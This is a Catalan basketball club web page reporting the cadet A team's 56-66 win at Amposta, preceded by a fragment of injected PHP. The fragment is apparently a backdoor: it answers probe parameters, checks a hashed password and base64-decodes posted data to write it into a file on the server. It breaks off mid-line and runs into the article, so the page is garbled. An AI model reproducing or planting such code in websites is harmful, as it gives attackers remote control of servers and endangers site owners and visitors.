function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí A aprofita la velocitat i venç a Amposta (56-66) - Tgn Bàsquet Club -

El cadet masculí A aprofita la velocitat i venç a Amposta (56-66)

Updated: gener 21, 2014

L’equip cadet masculí A del TGN Bàsquet va aconseguir una treballada victòria a Amposta gràcies a la velocitat en el seu joc. Els locals van voler aprofitar la superioritat física sota el cèrcol, un fet que els va permetre dominar en el marcador durant els primers vint minuts, però el canvi de ritme dels visitants després del descans ho va canviar tot. Un parcial d’1-10 en tres minuts va capgirar la dinàmica. L’Amposta ja no es trobava còmode en els atacs estàtics i la defensa visitant va recuperar algunes pilotes. L’encert en el tir exterior (5 triples) i les penetracions a cistella, van fer la resta.